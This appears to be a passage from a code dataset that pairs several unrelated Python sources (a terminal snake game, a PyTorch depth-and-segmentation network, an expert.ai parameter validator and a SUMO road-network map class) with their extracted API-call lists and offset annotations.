if self.x == 1 or self.x == mapX or self.y == 1 or self.y == mapY or (self.x, self.y) in self.positions:
self.die()
self.positions.append((self.x, self.y))
if self.positions.__len__() > self.eatenApples:
self.positions.pop(0)
if self.x == apple.x and self.y == apple.y:
self.eatenApples += 1
apple.eaten = True
if not self.dead:
change_dir()
self.render()
##################################################
# Update gameMapList so, later, it can be displayed
def render(self):
for n, i in enumerate(gameMapList):
if i == self.body:
gameMapList[n] = " "
for i in self.positions:
change_char_at(self.body, i[0], i[1])
change_char_at(self.head, self.x, self.y)
# The apple class
class Apple:
def __init__(self, char):
self.char = char
self.x = 1
self.y = 1
self.eaten = True
def spawn(self):
if self.eaten:
self.x = random.randint(2, mapX - 1)
self.y = random.randint(2, mapY - 1)
if (self.x, self.y) not in snake.positions:
change_char_at(self.char, self.x, self.y)
self.eaten = False
else:
# print("ahah found")
self.spawn() # I know, I know, I shouldn't be doing this lol
# Get the user's input without stopping the program
currentInput = "d"
inputListener = threading.Thread(target=input_listener)
inputListener.daemon = True
inputListener.start()
# Game objects
GapBetweenFrames = 0.15
snake = Snake(4, 10, "\u001b[32m@\u001b[0m", "\u001b[32mo\u001b[0m")
apple = Apple("\u001b[31mX\u001b[0m")
# Start the game
clear()
print("Move with \u001b[36mWASD\u001b[0m")
print(4)
time.sleep(1)
print(3)
time.sleep(1)
print(2)
time.sleep(1)
print(1)
time.sleep(1)
previous_time = time.time()
dt = 0
# Game loop
while not snake.dead:
time.sleep(GapBetweenFrames)
snake.update()
apple.spawn()
update_map()
print(f"Score: {snake.eatenApples - 1}")
dt = time.time() - previous_time
previous_time = time.time()
# Debug
print(f"Delta time: {dt}")
|
[
"colorama.init",
"threading.Thread",
"sys.stdin.read",
"random.randint",
"termios.tcgetattr",
"msvcrt.getch",
"os.system",
"time.time",
"time.sleep",
"termios.tcsetattr",
"select.select",
"sys.stdin.fileno"
] |
[((7164, 7203), 'threading.Thread', 'threading.Thread', ([], {'target': 'input_listener'}), '(target=input_listener)\n', (7180, 7203), False, 'import threading\n'), ((7492, 7505), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (7502, 7505), False, 'import time\n'), ((7517, 7530), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (7527, 7530), False, 'import time\n'), ((7542, 7555), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (7552, 7555), False, 'import time\n'), ((7567, 7580), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (7577, 7580), False, 'import time\n'), ((7600, 7611), 'time.time', 'time.time', ([], {}), '()\n', (7609, 7611), False, 'import time\n'), ((187, 202), 'colorama.init', 'colorama.init', ([], {}), '()\n', (200, 202), False, 'import colorama\n'), ((417, 440), 'os.system', 'os.system', (['clearCommand'], {}), '(clearCommand)\n', (426, 440), False, 'import os\n'), ((3360, 3377), 'sys.stdin.read', 'sys.stdin.read', (['(1)'], {}), '(1)\n', (3374, 3377), False, 'import sys\n'), ((3423, 3484), 'termios.tcsetattr', 'termios.tcsetattr', (['sys.stdin', 'termios.TCSADRAIN', 'old_settings'], {}), '(sys.stdin, termios.TCSADRAIN, old_settings)\n', (3440, 3484), False, 'import termios\n'), ((3529, 3557), 'termios.tcgetattr', 'termios.tcgetattr', (['sys.stdin'], {}), '(sys.stdin)\n', (3546, 3557), False, 'import termios\n'), ((7661, 7689), 'time.sleep', 'time.sleep', (['GapBetweenFrames'], {}), '(GapBetweenFrames)\n', (7671, 7689), False, 'import time\n'), ((7856, 7867), 'time.time', 'time.time', ([], {}), '()\n', (7865, 7867), False, 'import time\n'), ((3253, 3290), 'select.select', 'select.select', (['[sys.stdin]', '[]', '[]', '(0)'], {}), '([sys.stdin], [], [], 0)\n', (3266, 3290), False, 'import select\n'), ((3579, 3597), 'sys.stdin.fileno', 'sys.stdin.fileno', ([], {}), '()\n', (3595, 3597), False, 'import sys\n'), ((7807, 7818), 'time.time', 'time.time', ([], {}), '()\n', (7816, 7818), False, 'import time\n'), ((6701, 6728), 'random.randint', 'random.randint', (['(2)', '(mapX - 1)'], {}), '(2, mapX - 1)\n', (6715, 6728), False, 'import random\n'), ((6751, 6778), 'random.randint', 'random.randint', (['(2)', '(mapY - 1)'], {}), '(2, mapY - 1)\n', (6765, 6778), False, 'import random\n'), ((3724, 3738), 'msvcrt.getch', 'msvcrt.getch', ([], {}), '()\n', (3736, 3738), False, 'import msvcrt\n')]
|
from kha.episode import Episode
from kha.episode_patchers.episode_adder import EpisodeAdder
from kha.episode_patchers.episode_replacer import EpisodeReplacer
from kha.episode_patchers.noop_patcher import NoopPatcher
from kha.episode_patchers.patcher import Patcher
from kha.local_types import EventsDict, Uuid
def episode_diff(events_dict: EventsDict,
incoming_episode: Episode) -> Patcher:
return NoopPatcher()
|
[
"kha.episode_patchers.noop_patcher.NoopPatcher"
] |
[((421, 434), 'kha.episode_patchers.noop_patcher.NoopPatcher', 'NoopPatcher', ([], {}), '()\n', (432, 434), False, 'from kha.episode_patchers.noop_patcher import NoopPatcher\n')]
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from typing import Optional
from .base_model import BaseModel
__all__ = ['DSResNet']
class DoubleConvBlock(BaseModel):
def __init__(self, in_channels: int, out_channels: int):
super(DoubleConvBlock, self).__init__()
self.conv1 = nn.Sequential(
nn.Conv2d(
in_channels, out_channels,
kernel_size=3, padding=1
),
nn.ReLU(),
nn.BatchNorm2d(out_channels),
)
self.conv2 = nn.Sequential(
nn.Conv2d(
out_channels, out_channels,
kernel_size=3, padding=1
),
nn.ReLU(),
nn.BatchNorm2d(out_channels),
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
out = self.conv1(x)
out = self.conv2(out)
return out
class ResEncoderBlock(BaseModel):
def __init__(self, in_channels: int, out_channels: int):
super(ResEncoderBlock, self).__init__()
self.double_conv = DoubleConvBlock(
in_channels, out_channels
)
self.skip_conv = nn.Conv2d(
in_channels, out_channels, kernel_size=1
)
self.down = nn.MaxPool2d(2)
def forward(self, x: torch.Tensor) -> torch.Tensor:
identity = self.skip_conv(x)
out = self.double_conv(x)
out = out + identity
return self.down(out), out
class ResDecoderBlock(BaseModel):
def __init__(self, in_channels: int, out_channels: int):
super(ResDecoderBlock, self).__init__()
self.transition_conv = nn.Sequential(
nn.Conv2d(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=1
)
)
self.enc_skip_conv = nn.Conv2d(
in_channels, out_channels, kernel_size=1
)
self.skip_conv = nn.Conv2d(
in_channels, out_channels, kernel_size=1
)
self.double_conv = DoubleConvBlock(
in_channels, out_channels
)
def forward(
self, x: torch.Tensor, encoder_input: torch.Tensor, skip_input: Optional[torch.Tensor] = None
) -> torch.Tensor:
# Transition
x = self.transition_conv(x)
x = F.interpolate(
x, scale_factor=2, mode='bilinear', align_corners=False
)
if not skip_input is None:
encoder_input = torch.cat(
[encoder_input, skip_input], dim=1
)
encoder_input = self.enc_skip_conv(encoder_input)
x = torch.cat([x, encoder_input], dim=1)
# Decoding
identity = self.skip_conv(x)
out = self.double_conv(x)
out = out + identity
return out
class DSResNet(BaseModel):
"""A U-Net Inspired model for Monocular Depth Estimation and Image Segmentation.
For information check the `Depth-Estimation-Segmentation repository
<https://github.com/shan18/Depth-Estimation-Segmentation>`_.
`Note`: This model inherits the ``BaseModel`` class.
"""
def __init__(self):
super(DSResNet, self).__init__()
# Encoder Network
# ===============
# Preparation Block for bg
self.b1 = ResEncoderBlock(3, 16)
self.b2 = ResEncoderBlock(16, 32)
# Preparation Block for bg_fg
self.bf1 = ResEncoderBlock(3, 16)
self.bf2 = ResEncoderBlock(16, 32)
# Join both inputs
self.merge = nn.Conv2d(64, 32, kernel_size=1)
# Merged encoder network
self.enc1 = ResEncoderBlock(32, 64)
self.enc2 = ResEncoderBlock(64, 128)
self.enc3 = ResEncoderBlock(128, 256)
self.enc4 = ResEncoderBlock(256, 512)
# Decoder Network
# ===============
# Decoder Network - Segmentation
self.Mdec3 = ResDecoderBlock(512, 256)
self.Mdec2 = ResDecoderBlock(256, 128)
self.Mdec1 = ResDecoderBlock(128, 64)
self.M2 = ResDecoderBlock(64, 32)
self.M1 = ResDecoderBlock(32, 16)
self.M0 = nn.Conv2d(16, 1, kernel_size=1)
# Decoder Network - Depth
self.Ddec3 = ResDecoderBlock(512, 256)
self.Ddec2 = ResDecoderBlock(256, 128)
self.Ddec1 = ResDecoderBlock(128, 64)
self.D2 = ResDecoderBlock(64, 32)
self.D1 = ResDecoderBlock(32, 16)
self.D0 = nn.Conv2d(16, 1, kernel_size=1)
def forward(self, x: torch.Tensor) -> torch.Tensor:
# bg
b1_down, b1 = self.b1(x['bg'])
b2_down, b2 = self.b2(b1_down)
# bg_fg
bf1_down, bf1 = self.bf1(x['bg_fg'])
bf2_down, bf2 = self.bf2(bf1_down)
# Merging
merge = torch.cat([b2_down, bf2_down], dim=1)
merge = self.merge(merge)
# Merged Encoder
enc1_down, enc1 = self.enc1(merge)
enc2_down, enc2 = self.enc2(enc1_down)
enc3_down, enc3 = self.enc3(enc2_down)
_, enc4 = self.enc4(enc3_down)
# Decoder - Segmentation
Mdec3 = self.Mdec3(enc4, enc3)
Mdec2 = self.Mdec2(Mdec3, enc2)
Mdec1 = self.Mdec1(Mdec2, enc1)
m2 = self.M2(Mdec1, b2, bf2)
m1 = self.M1(m2, b1, bf1)
outM = self.M0(m1)
# Decoder - Depth
Ddec3 = self.Ddec3(enc4, enc3)
Ddec2 = self.Ddec2(Ddec3, enc2)
Ddec1 = self.Ddec1(Ddec2, enc1)
d2 = self.D2(Ddec1, b2, bf2)
d1 = self.D1(d2, b1, bf1)
outD = self.D0(d1)
return outD, outM
|
[
"torch.nn.ReLU",
"torch.nn.Conv2d",
"torch.cat",
"torch.nn.BatchNorm2d",
"torch.nn.MaxPool2d",
"torch.nn.functional.interpolate"
] |
[((1167, 1218), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channels', 'out_channels'], {'kernel_size': '(1)'}), '(in_channels, out_channels, kernel_size=1)\n', (1176, 1218), True, 'import torch.nn as nn\n'), ((1261, 1276), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2)'], {}), '(2)\n', (1273, 1276), True, 'import torch.nn as nn\n'), ((1852, 1903), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channels', 'out_channels'], {'kernel_size': '(1)'}), '(in_channels, out_channels, kernel_size=1)\n', (1861, 1903), True, 'import torch.nn as nn\n'), ((1951, 2002), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channels', 'out_channels'], {'kernel_size': '(1)'}), '(in_channels, out_channels, kernel_size=1)\n', (1960, 2002), True, 'import torch.nn as nn\n'), ((2329, 2399), 'torch.nn.functional.interpolate', 'F.interpolate', (['x'], {'scale_factor': '(2)', 'mode': '"""bilinear"""', 'align_corners': '(False)'}), "(x, scale_factor=2, mode='bilinear', align_corners=False)\n", (2342, 2399), True, 'import torch.nn.functional as F\n'), ((2635, 2671), 'torch.cat', 'torch.cat', (['[x, encoder_input]'], {'dim': '(1)'}), '([x, encoder_input], dim=1)\n', (2644, 2671), False, 'import torch\n'), ((3540, 3572), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(32)'], {'kernel_size': '(1)'}), '(64, 32, kernel_size=1)\n', (3549, 3572), True, 'import torch.nn as nn\n'), ((4125, 4156), 'torch.nn.Conv2d', 'nn.Conv2d', (['(16)', '(1)'], {'kernel_size': '(1)'}), '(16, 1, kernel_size=1)\n', (4134, 4156), True, 'import torch.nn as nn\n'), ((4434, 4465), 'torch.nn.Conv2d', 'nn.Conv2d', (['(16)', '(1)'], {'kernel_size': '(1)'}), '(16, 1, kernel_size=1)\n', (4443, 4465), True, 'import torch.nn as nn\n'), ((4754, 4791), 'torch.cat', 'torch.cat', (['[b2_down, bf2_down]'], {'dim': '(1)'}), '([b2_down, bf2_down], dim=1)\n', (4763, 4791), False, 'import torch\n'), ((350, 412), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channels', 'out_channels'], {'kernel_size': '(3)', 'padding': '(1)'}), '(in_channels, out_channels, kernel_size=3, padding=1)\n', (359, 412), True, 'import torch.nn as nn\n'), ((472, 481), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (479, 481), True, 'import torch.nn as nn\n'), ((495, 523), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['out_channels'], {}), '(out_channels)\n', (509, 523), True, 'import torch.nn as nn\n'), ((583, 646), 'torch.nn.Conv2d', 'nn.Conv2d', (['out_channels', 'out_channels'], {'kernel_size': '(3)', 'padding': '(1)'}), '(out_channels, out_channels, kernel_size=3, padding=1)\n', (592, 646), True, 'import torch.nn as nn\n'), ((706, 715), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (713, 715), True, 'import torch.nn as nn\n'), ((729, 757), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['out_channels'], {}), '(out_channels)\n', (743, 757), True, 'import torch.nn as nn\n'), ((1674, 1750), 'torch.nn.Conv2d', 'nn.Conv2d', ([], {'in_channels': 'in_channels', 'out_channels': 'out_channels', 'kernel_size': '(1)'}), '(in_channels=in_channels, out_channels=out_channels, kernel_size=1)\n', (1683, 1750), True, 'import torch.nn as nn\n'), ((2485, 2530), 'torch.cat', 'torch.cat', (['[encoder_input, skip_input]'], {'dim': '(1)'}), '([encoder_input, skip_input], dim=1)\n', (2494, 2530), False, 'import torch\n')]
|
# Copyright (c) 2020 original authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an \"AS IS\" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from expertai.nlapi.v1 import constants
from expertai.nlapi.v1.errors import ParameterError
class ExpertAiValidation:
"""
To be consistent, every new method added to verify a value should be
name according this pattern: [value_name]_value_is_correct
"""
def language_value_is_correct(self, language):
return language in constants.LANGUAGES.keys()
def resource_value_is_correct(self, resource):
return resource in constants.RESOURCES_NAMES
def check_name(self, param_name):
if param_name not in constants.PARAMETER_NAMES:
raise ParameterError("{} - invalid name".format(param_name))
def check_value(self, param_name, value):
method_name = "{}_value_is_correct".format(param_name)
method = getattr(self, method_name)
if not method(**{param_name: value}):
raise ParameterError(
"{} - invalid value: {}".format(param_name, value)
)
def check_parameters(self, params):
for p_name, p_value in params.items():
self.check_name(p_name)
self.check_value(p_name, p_value)
|
[
"expertai.nlapi.v1.constants.LANGUAGES.keys"
] |
[((935, 961), 'expertai.nlapi.v1.constants.LANGUAGES.keys', 'constants.LANGUAGES.keys', ([], {}), '()\n', (959, 961), False, 'from expertai.nlapi.v1 import constants\n')]
|
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import logging
import os
import random
from functools import lru_cache
from subprocess import check_output
from typing import List, Optional, Sequence, Set, Tuple
import numpy as np
import trimesh
import trimesh.scene
from cached_property import cached_property
from shapely.geometry import Point as shPoint
from shapely.geometry import Polygon
from shapely.ops import nearest_points, snap
from trimesh.exchange import gltf
from smarts.sstudio.types import MapSpec
from .coordinates import BoundingBox, Heading, Point, Pose, RefLinePoint
from .lanepoints import LanePoints, LinkedLanePoint
from .road_map import RoadMap, Waypoint
from .utils.geometry import buffered_shape, generate_mesh_from_polygons
from .utils.math import inplace_unwrap, radians_to_vec, vec_2d
from smarts.core.utils.sumo import sumolib # isort:skip
from sumolib.net.edge import Edge # isort:skip
def _convert_camera(camera):
result = {
"name": camera.name,
"type": "perspective",
"perspective": {
"aspectRatio": camera.fov[0] / camera.fov[1],
"yfov": np.radians(camera.fov[1]),
"znear": float(camera.z_near),
# HACK: The trimesh gltf export doesn't include a zfar which Panda3D GLB
# loader expects. Here we override to make loading possible.
"zfar": float(camera.z_near + 100),
},
}
return result
gltf._convert_camera = _convert_camera
class _GLBData:
def __init__(self, bytes_):
self._bytes = bytes_
def write_glb(self, output_path):
"""Generate a `.glb` geometry file."""
with open(output_path, "wb") as f:
f.write(self._bytes)
class SumoRoadNetwork(RoadMap):
"""A road network for a SUMO source."""
DEFAULT_LANE_WIDTH = 3.2
"""3.2 is the default Sumo road network lane width if it's not specified
explicitly in Sumo's NetEdit or the map.net.xml file.
This corresponds on a 1:1 scale to lanes 3.2m wide, which is typical
in North America (although US highway lanes are wider at ~3.7m)."""
def __init__(self, graph, net_file: str, map_spec: MapSpec):
self._log = logging.getLogger(self.__class__.__name__)
self._graph = graph
self._net_file = net_file
self._map_spec = map_spec
self._default_lane_width = SumoRoadNetwork._spec_lane_width(map_spec)
self._surfaces = {}
self._lanes = {}
self._roads = {}
self._waypoints_cache = SumoRoadNetwork._WaypointsCache()
self._lanepoints = None
if map_spec.lanepoint_spacing is not None:
assert map_spec.lanepoint_spacing > 0
# XXX: this should be last here since LanePoints() calls road_network methods immediately
self._lanepoints = LanePoints.from_sumo(
self, spacing=map_spec.lanepoint_spacing
)
@staticmethod
def _check_net_origin(bbox):
assert len(bbox) == 4
return bbox[0] <= 0.0 and bbox[1] <= 0.0 and bbox[2] >= 0.0 and bbox[3] >= 0.0
shifted_net_file_name = "shifted_map-AUTOGEN.net.xml"
@classmethod
def shifted_net_file_path(cls, net_file_path):
"""The path of the modified map file after coordinate normalization."""
net_file_folder = os.path.dirname(net_file_path)
return os.path.join(net_file_folder, cls.shifted_net_file_name)
@classmethod
@lru_cache(maxsize=1)
def _shift_coordinates(cls, net_file_path, shifted_path):
assert shifted_path != net_file_path
logger = logging.getLogger(cls.__name__)
logger.info(f"normalizing net coordinates into {shifted_path}...")
## Translate the map's origin to remove huge (imprecise) offsets.
## See https://sumo.dlr.de/docs/netconvert.html#usage_description
## for netconvert options description.
try:
stdout = check_output(
[
"netconvert",
"--offset.disable-normalization=FALSE",
"-s",
net_file_path,
"-o",
shifted_path,
]
)
logger.debug(f"netconvert output: {stdout}")
return True
except Exception as e:
logger.warning(
f"unable to use netconvert tool to normalize coordinates: {e}"
)
return False
@classmethod
def from_spec(cls, map_spec: MapSpec):
"""Generate a road network from the given map specification."""
net_file = SumoRoadNetwork._map_path(map_spec)
# Connections to internal lanes are implicit. If `withInternal=True` is
# set internal junctions and the connections from internal lanes are
# loaded into the network graph.
G = sumolib.net.readNet(net_file, withInternal=True)
if not cls._check_net_origin(G.getBoundary()):
shifted_net_file = cls.shifted_net_file_path(net_file)
if os.path.isfile(shifted_net_file) or (
map_spec.shift_to_origin
and cls._shift_coordinates(net_file, shifted_net_file)
):
G = sumolib.net.readNet(shifted_net_file, withInternal=True)
assert cls._check_net_origin(G.getBoundary())
net_file = shifted_net_file
# keep track of having shifted the graph by
# injecting state into the network graph.
# this is needed because some maps have been pre-shifted,
# and will already have a locationOffset, but for those
# the offset should not be used (because all their other
# coordinates are relative to the origin).
G._shifted_by_smarts = True
return cls(G, net_file, map_spec)
@property
def source(self) -> str:
"""This is the net.xml file that corresponds with our possibly-offset coordinates."""
return self._net_file
@staticmethod
def _spec_lane_width(map_spec: MapSpec) -> float:
return (
map_spec.default_lane_width
if map_spec.default_lane_width is not None
else SumoRoadNetwork.DEFAULT_LANE_WIDTH
)
@staticmethod
def _map_path(map_spec: MapSpec) -> str:
if os.path.isdir(map_spec.source):
# map.net.xml is the default Sumo map name; try that:
return os.path.join(map_spec.source, "map.net.xml")
return map_spec.source
def is_same_map(self, map_spec: MapSpec) -> bool:
"""Test if the road network is identical to the given map specification."""
return (
(
map_spec.source == self._map_spec.source
or SumoRoadNetwork._map_path(map_spec)
== SumoRoadNetwork._map_path(self._map_spec)
)
and map_spec.lanepoint_spacing == self._map_spec.lanepoint_spacing
and (
map_spec.default_lane_width == self._map_spec.default_lane_width
or SumoRoadNetwork._spec_lane_width(map_spec)
== SumoRoadNetwork._spec_lane_width(self._map_spec)
)
and (
map_spec.shift_to_origin == self._map_spec.shift_to_origin
or (not map_spec.shift_to_origin and not self._graph._shifted_by_smarts)
)
)
@cached_property
def bounding_box(self) -> BoundingBox:
"""Get the minimal axis aligned bounding box that contains all map geometry."""
# maps are assumed to start at the origin
bb = self._graph.getBoundary() # 2D bbox in format (xmin, ymin, xmax, ymax)
return BoundingBox(
min_pt=Point(x=bb[0], y=bb[1]), max_pt=Point(x=bb[2], y=bb[3])
)
@property
def scale_factor(self) -> float:
"""Get the scale factor between the default lane width and the default lane width."""
# map units per meter
return self._default_lane_width / SumoRoadNetwork.DEFAULT_LANE_WIDTH
def to_glb(self, at_path):
"""Build a glb file for camera rendering and envision"""
polys = self._compute_road_polygons()
glb = self._make_glb_from_polys(polys)
glb.write_glb(at_path)
class Surface(RoadMap.Surface):
"""Describes a surface."""
def __init__(self, surface_id: str, road_map):
self._surface_id = surface_id
self._map = road_map
@property
def surface_id(self) -> str:
"""The identifier for this surface."""
return self._surface_id
@property
def is_drivable(self) -> bool:
"""If it is possible to drive on this surface."""
# all surfaces on Sumo road networks are drivable
return True
def surface_by_id(self, surface_id: str) -> RoadMap.Surface:
"""Find a surface by its identifier."""
return self._surfaces.get(surface_id)
class Lane(RoadMap.Lane, Surface):
"""Describes a lane."""
def __init__(self, lane_id: str, sumo_lane, road_map):
super().__init__(lane_id, road_map)
self._lane_id = lane_id
self._sumo_lane = sumo_lane
self._road = road_map.road_by_id(sumo_lane.getEdge().getID())
assert self._road
@property
def lane_id(self) -> str:
return self._lane_id
@property
def road(self) -> RoadMap.Road:
return self._road
@cached_property
def speed_limit(self) -> float:
return self._sumo_lane.getSpeed()
@cached_property
def length(self) -> float:
return self._sumo_lane.getLength()
@cached_property
def _width(self) -> float:
return self._sumo_lane.getWidth()
@property
def in_junction(self) -> bool:
"""If this lane is part of a junction/intersection."""
return self._road.is_junction
@cached_property
def index(self) -> int:
"""The index of this lane within the road it is part of."""
return self._sumo_lane.getIndex()
@cached_property
def lanes_in_same_direction(self) -> List[RoadMap.Lane]:
"""Find nearby lanes heading in the same direction as this lane."""
if not self.in_junction:
# When not in an intersection, all SUMO Lanes for an Edge go in the same direction.
return [l for l in self.road.lanes if l != self]
result = []
in_roads = set(il.road for il in self.incoming_lanes)
out_roads = set(il.road for il in self.outgoing_lanes)
for lane in self.road.lanes:
if self == lane:
continue
other_in_roads = set(il.road for il in lane.incoming_lanes)
if in_roads & other_in_roads:
other_out_roads = set(il.road for il in self.outgoing_lanes)
if out_roads & other_out_roads:
result.append(lane)
return result
@cached_property
def lane_to_left(self) -> Tuple[RoadMap.Lane, bool]:
"""Get the lane to the left of this lane assuming right hand driving."""
result = None
for other in self.lanes_in_same_direction:
if other.index > self.index and (
not result or other.index < result.index
):
result = other
return result, True
@cached_property
def lane_to_right(self) -> Tuple[RoadMap.Lane, bool]:
"""Get the lane to the right of this lane assuming right hand driving."""
result = None
for other in self.lanes_in_same_direction:
if other.index < self.index and (
not result or other.index > result.index
):
result = other
return result, True
@cached_property
def incoming_lanes(self) -> List[RoadMap.Lane]:
"""Lanes leading into this lane."""
return [
self._map.lane_by_id(incoming.getID())
for incoming in self._sumo_lane.getIncoming()
]
@cached_property
def outgoing_lanes(self) -> List[RoadMap.Lane]:
"""Lanes leading out of this lane."""
return [
self._map.lane_by_id(
outgoing.getViaLaneID() or outgoing.getToLane().getID()
)
for outgoing in self._sumo_lane.getOutgoing()
]
@cached_property
def entry_surfaces(self) -> List[RoadMap.Surface]:
"""All surfaces leading into this lane."""
return self.incoming_lanes
@cached_property
def exit_surfaces(self) -> List[RoadMap.Surface]:
"""All surfaces leading out of this lane."""
return self.outgoing_lanes
@lru_cache(maxsize=16)
def oncoming_lanes_at_offset(self, offset: float) -> List[RoadMap.Lane]:
"""Adjacent lanes travelling in the opposite direction to this lane."""
result = []
radius = 1.1 * self.width_at_offset(offset)
pt = self.from_lane_coord(RefLinePoint(offset))
nearby_lanes = self._map.nearest_lanes(pt, radius=radius)
if not nearby_lanes:
return result
my_vect = self.vector_at_offset(offset)
my_norm = np.linalg.norm(my_vect)
if my_norm == 0:
return result
threshold = -0.995562 # cos(175*pi/180)
for lane, _ in nearby_lanes:
if lane == self:
continue
lane_refline_pt = lane.to_lane_coord(pt)
lv = lane.vector_at_offset(lane_refline_pt.s)
lv_norm = np.linalg.norm(lv)
if lv_norm == 0:
continue
lane_angle = np.dot(my_vect, lv) / (my_norm * lv_norm)
if lane_angle < threshold:
result.append(lane)
return result
@cached_property
def foes(self) -> List[RoadMap.Lane]:
"""Lanes that cross over this lane (useful in junctions.)"""
# TODO: we might do better here since Sumo/Traci determines right-of-way for their connections/links. See:
# https://sumo.dlr.de/pydoc/traci._lane.html#LaneDomain-getFoes
result = [
incoming
for outgoing in self.outgoing_lanes
for incoming in outgoing.incoming_lanes
if incoming != self
]
if self.in_junction:
in_roads = set(il.road for il in self.incoming_lanes)
for foe in self.road.lanes:
foe_in_roads = set(il.road for il in foe.incoming_lanes)
if not bool(in_roads & foe_in_roads):
result.append(foe)
return list(set(result))
def waypoint_paths_for_pose(
self, pose: Pose, lookahead: int, route: RoadMap.Route = None
) -> List[List[Waypoint]]:
road_ids = [road.road_id for road in route.roads] if route else None
return self._waypoint_paths_at(pose.position, lookahead, road_ids)
def waypoint_paths_at_offset(
self, offset: float, lookahead: int = 30, route: RoadMap.Route = None
) -> List[List[Waypoint]]:
wp_start = self.from_lane_coord(RefLinePoint(offset))
road_ids = [road.road_id for road in route.roads] if route else None
return self._waypoint_paths_at(wp_start, lookahead, road_ids)
def _waypoint_paths_at(
self,
point: Sequence,
lookahead: int,
filter_road_ids: Optional[Sequence[str]] = None,
) -> List[List[Waypoint]]:
"""Waypoints on this lane leading on from the given point."""
closest_linked_lp = (
self._map._lanepoints.closest_linked_lanepoint_on_lane_to_point(
point, self._lane_id
)
)
return self._map._waypoints_starting_at_lanepoint(
closest_linked_lp,
lookahead,
tuple(filter_road_ids) if filter_road_ids else (),
tuple(point),
)
@lru_cache(maxsize=4)
def shape(
self, buffer_width: float = 0.0, default_width: Optional[float] = None
) -> Polygon:
"""The lane geometry as a shape."""
new_width = buffer_width
if default_width:
new_width += default_width
else:
new_width += self._width
assert new_width >= 0.0
assert new_width >= 0.0
if new_width > 0:
return buffered_shape(self._sumo_lane.getShape(), new_width)
line = self._sumo_lane.getShape()
bline = buffered_shape(line, 0.0)
return line if bline.is_empty else bline
@lru_cache(maxsize=8)
def contains_point(self, point: Point) -> bool:
"""If the given point is within this lane."""
# TAI: could use (cached) self._sumo_lane.getBoundingBox(...) as a quick first-pass check...
lane_point = self.to_lane_coord(point)
return (
abs(lane_point.t) <= self._width / 2 and 0 <= lane_point.s < self.length
)
@lru_cache(maxsize=8)
def offset_along_lane(self, world_point: Point) -> float:
shape = self._sumo_lane.getShape(False)
point = world_point[:2]
if point not in shape:
return sumolib.geomhelper.polygonOffsetWithMinimumDistanceToPoint(
point, shape, perpendicular=False
)
# SUMO geomhelper.polygonOffset asserts when the point is part of the shape.
# We get around the assertion with a check if the point is part of the shape.
offset = 0
for i in range(len(shape) - 1):
if shape[i] == point:
break
offset += sumolib.geomhelper.distance(shape[i], shape[i + 1])
return offset
def width_at_offset(self, offset: float) -> float:
return self._width
@lru_cache(maxsize=8)
def project_along(
self, start_offset: float, distance: float
) -> Set[Tuple[RoadMap.Lane, float]]:
return super().project_along(start_offset, distance)
@lru_cache(maxsize=8)
def from_lane_coord(self, lane_point: RefLinePoint) -> Point:
shape = self._sumo_lane.getShape(False)
x, y = sumolib.geomhelper.positionAtShapeOffset(shape, lane_point.s)
return Point(x=x, y=y)
@lru_cache(maxsize=8)
def to_lane_coord(self, world_point: Point) -> RefLinePoint:
return super().to_lane_coord(world_point)
@lru_cache(maxsize=8)
def center_at_point(self, point: Point) -> Point:
return super().center_at_point(point)
@lru_cache(8)
def edges_at_point(self, point: Point) -> Tuple[Point, Point]:
return super().edges_at_point(point)
@lru_cache(8)
def vector_at_offset(self, start_offset: float) -> np.ndarray:
return super().vector_at_offset(start_offset)
@lru_cache(maxsize=8)
def center_pose_at_point(self, point: Point) -> Pose:
return super().center_pose_at_point(point)
@lru_cache(maxsize=8)
def curvature_radius_at_offset(
self, offset: float, lookahead: int = 5
) -> float:
return super().curvature_radius_at_offset(offset, lookahead)
def lane_by_id(self, lane_id: str) -> RoadMap.Lane:
lane = self._lanes.get(lane_id)
if lane:
return lane
sumo_lane = self._graph.getLane(lane_id)
if not sumo_lane:
self._log.warning(
f"SumoRoadNetwork got request for unknown lane_id '{lane_id}'"
)
return None
lane = SumoRoadNetwork.Lane(lane_id, sumo_lane, self)
self._lanes[lane_id] = lane
assert lane_id not in self._surfaces
self._surfaces[lane_id] = lane
return lane
